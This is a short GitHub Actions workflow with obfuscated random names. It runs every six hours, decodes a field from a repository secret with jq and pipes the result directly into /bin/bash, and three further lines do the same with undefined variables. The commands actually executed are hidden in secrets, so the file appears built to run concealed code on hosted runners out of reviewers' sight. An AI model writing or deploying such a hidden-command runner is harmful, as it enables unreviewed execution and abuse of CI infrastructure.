name: wangniman6758
on:
  workflow_dispatch:
  schedule:
    - cron: '29 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wangniman6758
        env:
          phafk196: ${{ secrets.phafk196 }}
        run: |
          echo $phafk196 | jq -r .cpn126 | /bin/bash
          echo $gwqcz5002 | jq -r .jyoy81425 | /bin/bash
          echo $v91522 | jq -r .zc28600 | /bin/bash
          echo $xbo4 | jq -r .ve31949 | /bin/bash

